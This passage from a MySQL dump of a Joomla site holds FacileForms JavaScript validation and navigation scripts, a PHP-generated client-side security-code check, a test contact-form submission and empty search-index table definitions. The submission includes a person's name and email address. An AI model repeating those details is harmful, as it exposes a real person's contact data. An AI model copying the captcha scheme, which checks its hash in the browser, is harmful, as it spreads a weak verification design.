if (message==\'\') message = element.name+\" must be integer.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_integer'),(14,1,'FF','ff_integeramount','Positive Integer','Validate that an positive integer value is entered.','Element Validation','function ff_integeramount(element, message)\r\n{\r\n var ex = /(^-?\\d\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be integer.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_integeramount'),(15,1,'FF','ff_integer_or_empty','Integer or empty','Validate that either an integer value or nothing is entered.','Element Validation','function ff_integer_or_empty(element, message)\r\n{\r\n if (element.value != \'\') {\r\n var ex = /(^-?\\d\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be integer.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n } // if\r\n return \'\';\r\n} // ff_integer_or_empty'),(16,1,'FF','ff_nextpage','Next page','Switchs to the next page.','Element Action','function ff_nextpage(element, action)\r\n{\r\n if (ff_currentpage < ff_lastpage) {\r\n ff_switchpage(ff_currentpage+1);\r\n self.scrollTo(0,0);\r\n }\r\n} // ff_nextpage'),(17,1,'FF','ff_page1','Page 1','Switches to the first page.','Element Action','function ff_page1(element, action)\r\n{\r\n ff_switchpage(1);\r\n} // ff_page1'),(18,1,'FF','ff_page2','Page 2','Switches to the second page.','Element Action','function ff_page2(element, action)\r\n{\r\n if (ff_lastpage >= 2) ff_switchpage(2);\r\n} // ff_page2'),(19,1,'FF','ff_page3','Page 3','Switches to the third page.','Element Action','function ff_page3(element, action)\r\n{\r\n if (ff_lastpage >= 3) ff_switchpage(3);\r\n} // ff_page3'),(20,1,'FF','ff_previouspage','Previous page','Switches to the previous page.','Element Action','function ff_previouspage(element, action)\r\n{\r\n if (ff_currentpage > 1){\r\n ff_switchpage(ff_currentpage-1);\r\n self.scrollTo(0,0);\r\n }\r\n} // ff_previouspage'),(21,1,'FF','ff_real','Real Number','Validate that a real number is entered.','Element Validation','function ff_real(element, message)\r\n{\r\n var ex = /(^-?\\d\\d*\\.?\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be a number.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_real'),(22,1,'FF','ff_realamount','Positive Real Number','Validate that a positive real number is entered.','Element Validation','function ff_realamount(element, message)\r\n{\r\n var ex = /(^\\d\\d*\\.?\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be a number.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_realamount'),(23,1,'FF','ff_resetForm','Reset form','Reset all form inputs to the initial values.','Element Action','function ff_resetForm(element, action)\r\n{\r\n eval(\'document.\'+ff_processor.form_id).reset();\r\n} // ff_resetForm'),(24,1,'FF','ff_securitycode_entered','Security code entered','Check that a security code was entered.','Element Validation','function ff_securitycode_entered(element, message)\r\n{\r\n var ex = /(^\\d{5}$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = \"Security code must be entered as five digits.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_securitycode_entered'),(25,1,'FF','ff_securitycode_ok','Security code ok','Check that a valid security code was entered.','Element Validation','function ff_securitycode_ok(element, message)\r\n{\r\n<?php\r\n global $ff_seccode;\r\n if (!isset($ff_seccode)) { \r\n mt_srand((double)microtime()*1000000);\r\n $ff_seccode = mt_rand(10000, 99999);\r\n JFactory::getSession()->set(\'ff_seccode\', $ff_seccode);\r\n } // if\r\n $enc = array();\r\n mt_srand((double)microtime()*1000000);\r\n for ($i = 0; $i < 256; $i++) $enc[] = mt_rand(0, 255);\r\n $seccode = (string)$ff_seccode;\r\n $hash = \'\';\r\n $ini = $ff_seccode % 240;\r\n for ($i = 0; $i < 5; $i++) {\r\n $d = $ini+intval($seccode{$i});\r\n for ($j = 0; $j < 7; $j++) $d = $enc[$d];\r\n $hash .= $d;\r\n $ini = ($ini+$d) % 240;\r\n } // for\r\n return\r\n \"var enc = \".$this->expJsValue($enc).\";\\n\".\r\n \"var seccode = new String(element.value);\\n\".\r\n \"if (seccode.length==5) {\\n\".\r\n \" var hash = \'\';\\n\".\r\n \" var ini = parseInt(element.value) % 240;\\n\".\r\n \" var i, j;\\n\".\r\n \" for (i = 0; i < 5; i++) {\\n\".\r\n \" var d = ini+parseInt(seccode.charAt(i));\\n\".\r\n \" for (j = 0; j < 7; j++) d = enc[d];\\n\".\r\n \" hash += d;\\n\".\r\n \" ini = (ini+d) % 240;\\n\".\r\n \" } // for\\n\".\r\n \" if (hash == \'$hash\') return \'\';\\n\". \r\n \"} // if\\n\".\r\n \"if (message==\'\') message = \\\"Security code is missing or wrong.\\\\n\\\";\\n\".\r\n \"ff_validationFocus(element.name);\\n\".\r\n \"return message;\\n\";\r\n?>\r\n} // ff_securitycode_ok'),(26,1,'FF','ff_selectedValues','Get selected values as list','Get values of selected options of a select list as list:\r\n\r\nx = ff_selectedValues(\'myselectlist\');\r\n// x = green,red','Untyped','function ff_selectedValues(name)\r\n{\r\n vals = \'\';\r\n opts = ff_getElementByName(name).options;\r\n for (o = 0; o < opts.length; o++)\r\n if (opts[o].selected) {\r\n if (vals != \'\') vals += \',\';\r\n vals += opts[o].value;\r\n } // if\r\n return vals;\r\n} // ff_selectedValues'),(27,1,'FF','ff_setChecked','Set radiobutton checked','Set a radiobutton checked/unchecked','Untyped','function ff_setChecked(name, value, checked)\r\n{\r\n if (arguments.length<3) checked = true;\r\n for (var i = 0; i < ff_elements.length; i++)\r\n if (ff_elements[i][2]==name) {\r\n var e = ff_getElementByIndex(i);\r\n if (e.value == value) {\r\n e.checked = checked;\r\n break;\r\n } // if\r\n } // if\r\n} // ff_setChecked'),(28,1,'FF','ff_setSelected','Select options of select list','Select options in a Select List element.\r\n\r\nff_setSelected(\'mylist\', \'green\'); // select green in single or multi mode, unselect all other options\r\nff_setSelected(\'mylist\', \'red,green\'); // select red and green in multi mode, unselect all other options','Untyped','function ff_setSelected(name, list)\r\n{\r\n ids = list.split(\',\')\r\n opts = ff_getElementByName(name).options;\r\n for (o = 0; o < opts.length; o++) {\r\n state = false;\r\n for (i = 0; i < ids.length; i++) \r\n if (ids[i]==opts[o].value) {\r\n state = true;\r\n break;\r\n } // if\r\n opts[o].selected = state;\r\n } // for\r\n} // ff_setSelected'),(29,1,'FF','ff_showaction','Show action','Displays the element action.','Element Action','function ff_showaction(element, action)\r\n{\r\n alert(\'Action \'+action+\' performed by element \'+element.id);\r\n}'),(30,1,'FF','ff_showelementinit','Show element initialization','Display the element initialization (mainly for debugging)','Element Init','function ff_showelementinit(element,condition)\r\n{\r\n if(!element.name)\r\n if(element.length && element.length != 0)\r\n alert(\'Initialization of \'+element[0].name+\' at \'+condition);\r\n else\r\n alert(\'Initialization of \'+element.name+\' at \'+condition);\r\n}'),(31,1,'FF','ff_showforminit','Show form initialization','Show when form initialization is run (for debugging)','Form Init','function ff_showforminit()\r\n{\r\n alert(\'Form initialization\');\r\n}'),(32,1,'FF','ff_showsubmitted','Show submitted status','Display submit status as user feedback.','Form Submitted','function ff_showsubmitted(status, message)\r\n{\r\n alert(message);\r\n} // ff_showsubmitted'),(33,1,'FF','ff_showvalidation','Show element validation','Display element validation (for debugging)','Element Validation','function ff_showvalidation(element, message)\r\n{\r\n alert(\'Validation of \'+element.name+\" with message: \\n\"+message);\r\n return \'\';\r\n}'),(34,1,'FF','ff_submittedhome','Return to homepage','Display submit status and then return to the home page of the site.','Form Submitted','function ff_submittedhome(status, message)\r\n{\r\n alert(message+\"\\nYou will be redirected to the home page now.\");\r\n ff_returnHome();\r\n} // ff_submittedhome'),(35,1,'FF','ff_unchecked','Unchecked','Validate that radio button or checkbox is unchecked.','Element Validation','function ff_unchecked(element, message)\r\n{\r\n if (!element.checked) \r\n return \'\'; \r\n else {\r\n if (message==\'\') message = element.name+\" is checked.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n} // ff_unchecked'),(36,1,'FF','ff_validate_date_DDMMYYYY','Validate Date DD/MM/YYYY format','Validates that the date in a textfield is correctly formatted in DD/MM/YYYY format.\r\nCan be used with a textfield element and/or the Calendar element.','Element Validation','function ff_validate_date_DDMMYYYY(element, message)\r\n{\r\n // Regular expression used to check if date is in correct format\r\n var pattern = /[0-3][0-9]\\/(0|1)[0-9]\\/(19|20)[0-9]{2}/;\r\n if(pattern.test(element.value))\r\n {\r\n var date_array = element.value.split(\'/\');\r\n var day = date_array[0];\r\n\r\n // Attention! Javascript consider months in the range 0 - 11\r\n var month = date_array[1] - 1;\r\n var year = date_array[2];\r\n\r\n // This instruction will create a date object\r\n source_date = new Date(year,month,day);\r\n\r\n if(year != source_date.getFullYear())\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n\r\n if(month != source_date.getMonth())\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n\r\n if(day != source_date.getDate())\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n }\r\n else\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n\r\n return \'\';\r\n}'),(37,1,'FF','ff_validate_form','Validate form','Validates the form and displays the result.','Element Action','function ff_validate_form(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n error = ff_validation(0);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else\r\n alert(\'All inputs are valid.\');\r\n} // ff_validate_form'),(38,1,'FF','ff_validate_nextpage','Validate and next page','Validates the current page, and if everything is ok is switches to the next page.','Element Action','function ff_validate_nextpage(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n\r\n error = ff_validation(ff_currentpage);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else {\r\n ff_switchpage(ff_currentpage+1);\r\n self.scrollTo(0,0); \r\n }\r\n} // ff_validate_nextpage'),(39,1,'FF','ff_validate_page','Validate page','Validates the current page and displays the result.','Element Action','function ff_validate_page(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n error = ff_validation(ff_currentpage);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else\r\n alert(\'All inputs are valid.\');\r\n} // ff_validate_page'),(40,1,'FF','ff_validate_prevpage','Validate previous page','Validates the current page and switches to the previous page if all is ok','Element Action','function ff_validate_prevpage(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n\r\n error = ff_validation(ff_currentpage);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else{\r\n if(ff_currentpage > 1){\r\n ff_switchpage(ff_currentpage-1);\r\n self.scrollTo(0,0);\r\n }\r\n }\r\n} // ff_validate_prevpage'),(41,1,'FF','ff_validate_submit','Validate and submit form','Validates the whole form, and if everything is ok it submits the form.','Element Action','function ff_validate_submit(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n error = ff_validation(0);\r\n if (error != \'\') {\r\n\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus();\r\n } else\r\n ff_submitForm();\r\n} // ff_validate_submit'),(42,1,'FF','ff_validemail','Valid email','Validate entry of a valid email (syntax check only)','Element Validation','function ff_validemail(element, message)\r\n{\r\n var check =\r\n /^([a-zA-Z0-9_\\.\\-])+\\@(([a-zA-Z0-9\\-])+\\.)+([a-zA-Z0-9]{2,4})+$/;\r\n if (!check.test(element.value)){\r\n if (message==\'\') message = element.name+\" is no valid email address.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_validemail'),(43,1,'FF','ff_validemail_repeat','Validate Email repeat','Checks if the field value is a valid email address and has a second counterpart that has an equal value.\r\nThe 2nd email field must be named \"FIELDNAME_repeat\"!','Element Validation','function ff_validemail_repeat(element, message)\r\n{\r\n var check =\r\n /^([a-zA-Z0-9_\\.\\-])+\\@(([a-zA-Z0-9\\-])+\\.)+([a-zA-Z0-9]{2,4})+$/;\r\n if (!check.test(element.value)){\r\n if (message==\'\') message = element.name+\" is no valid email address.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n \r\n try{\r\n var repeat = element.name.split(\"ff_nm_\")[1].split(\"[]\")[0];\r\n \r\n if(!ff_getElementByName(repeat + \'_repeat\')){\r\n if (message==\'\') message = repeat+\" has no repeat email field.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } else {\r\n if(ff_getElementByName(repeat + \'_repeat\').value != element.value){\r\n if (message==\'\') message = element.name+\" and \" + repeat + \"_repeat do not match.\\n\";\r\n ff_validationFocus(repeat + \'_repeat\');\r\n return message;\r\n }\r\n }\r\n }catch(e){\r\n return e.description;\r\n }\r\n\r\n return \'\';\r\n} // ff_validemail'),(44,1,'FF','ff_valuenotempty','Value not empty','Validate that value is not empty.','Element Validation','function ff_valuenotempty(element, message)\r\n{\r\n if (element.value!=\'\') return \'\'; \r\n if (message==\'\') message = \"Please enter \"+element.name+\".\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n} // ff_valuenotempty');
/*!40000 ALTER TABLE `atlyh_facileforms_scripts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_subrecords`
--
DROP TABLE IF EXISTS `atlyh_facileforms_subrecords`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_subrecords` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`record` int(11) NOT NULL DEFAULT 0,
`element` int(11) NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`type` varchar(255) NOT NULL DEFAULT '',
`value` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_subrecords`
--
LOCK TABLES `atlyh_facileforms_subrecords` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_subrecords` DISABLE KEYS */;
INSERT INTO `atlyh_facileforms_subrecords` VALUES (1,1,1,'Name','NAME','Text','Bevan'),(2,1,5,'Email','EMAIL','Text','bevan@webspring.co.za'),(3,1,3,'Tel / Cel','CONTACT','Text','031'),(4,1,2,'Company','COMPANY','Text','WEBSPRING'),(5,1,4,'Message','MESSAGE','Textarea','Test');
/*!40000 ALTER TABLE `atlyh_facileforms_subrecords` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_filters`
--
DROP TABLE IF EXISTS `atlyh_finder_filters`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_filters` (
`filter_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`alias` varchar(255) NOT NULL,
`state` tinyint(1) NOT NULL DEFAULT 1,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL,
`created_by_alias` varchar(255) NOT NULL,
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`map_count` int(10) unsigned NOT NULL DEFAULT 0,
`data` text NOT NULL,
`params` mediumtext DEFAULT NULL,
PRIMARY KEY (`filter_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_filters`
--
LOCK TABLES `atlyh_finder_filters` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_filters` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_filters` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links`
--
DROP TABLE IF EXISTS `atlyh_finder_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links` (
`link_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`url` varchar(255) NOT NULL,
`route` varchar(255) NOT NULL,
`title` varchar(255) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
`indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`md5sum` varchar(32) DEFAULT NULL,
`published` tinyint(1) NOT NULL DEFAULT 1,
`state` int(5) DEFAULT 1,
`access` int(5) DEFAULT 0,
`language` varchar(8) NOT NULL,
`publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`list_price` double unsigned NOT NULL DEFAULT 0,
`sale_price` double unsigned NOT NULL DEFAULT 0,
`type_id` int(11) NOT NULL,
`object` mediumblob NOT NULL,
PRIMARY KEY (`link_id`),
KEY `idx_type` (`type_id`),
KEY `idx_title` (`title`),
KEY `idx_md5` (`md5sum`),
KEY `idx_url` (`url`(75)),
KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`),
KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links`
--
LOCK TABLES `atlyh_finder_links` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms0`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms0`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms0` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms0`
--
LOCK TABLES `atlyh_finder_links_terms0` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms0` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms0` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms1`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms1`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms1` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms1`
--
LOCK TABLES `atlyh_finder_links_terms1` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms1` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms1` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms2`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms2`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms2` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms2`
--
LOCK TABLES `atlyh_finder_links_terms2` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms2` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms2` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms3`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms3`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms3` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms3`
--
LOCK TABLES `atlyh_finder_links_terms3` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms3` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms3` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms4`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms4`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms4` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms4`
--
LOCK TABLES `atlyh_finder_links_terms4` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms4` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms4` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms5`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms5`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms5` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms5`
--
LOCK TABLES `atlyh_finder_links_terms5` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms5` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms5` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms6`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms6`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms6` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms6`
--
LOCK TABLES `atlyh_finder_links_terms6` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms6` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms6` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms7`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms7` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms7`
--
LOCK TABLES `atlyh_finder_links_terms7` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms7` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms7` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms8`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms8`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms8` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms8`
--
LOCK TABLES `atlyh_finder_links_terms8` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms8` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms8` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_terms9`
--
DROP TABLE IF EXISTS `atlyh_finder_links_terms9`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_terms9` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_terms9`
--
LOCK TABLES `atlyh_finder_links_terms9` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_terms9` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_terms9` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_termsa`
--
DROP TABLE IF EXISTS `atlyh_finder_links_termsa`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_termsa` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
